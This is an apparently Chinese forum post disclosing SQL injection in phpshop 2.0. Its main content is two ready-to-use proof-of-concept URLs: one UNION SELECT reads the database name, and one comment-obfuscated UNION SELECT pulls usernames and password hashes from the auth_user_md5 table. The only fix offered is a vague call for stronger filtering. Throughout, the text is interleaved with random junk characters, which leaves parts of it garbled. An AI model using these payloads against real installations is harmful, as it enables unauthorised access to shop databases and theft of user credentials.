标题 : phpshop 2.0 SQL Injection Vulnerability
Y2 c4 z/ C' ]: ` t8 i, K8 X# i0 c; V6 l2 `
作者 : By onestree0 `$ j) R. [& J% `& j
下载地址 : http://code.google.com/p/phpshop/downloads/list
+ H/ B. o2 V; A* w5 q4 g2 Q$ J+ M2 t测试地址: windows 7 / ubuntu
5 D( m4 U6 O1 @( O( v ! x" O! i3 c' q3 D
8 Q9 [0 V1 i1 z+ K$ ]4 P
SQLi p0c:
3 E1 n9 T' ?1 ~8 w/ c
3 i3 Q+ d T. a6 N0 Y- ]==================
+ j6 p: S3 b! y7 o1 v8 } % w0 g% a7 g4 H! D! U
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
4 E! A% E$ F9 I" l8 o2 z$ y( q4 uunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
2 p) V: K j' C1 B3 Z7 ?
, \, {1 |3 q9 J( K% Y) |http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--8 Z! f4 x) L7 i4 J% p
) X2 J) F3 M v# x" _# ]$ Z" T修复:8 P$ x$ ~- d) A3 P
加强过滤, ?# _8 E+ @9 q" {8 h
1 B: l; r" H u0 ~7 X3 U( }# p7 c
5 q; n a. R k |
发表于 2013-1-18 18:24:10
收藏
分享
支持
反对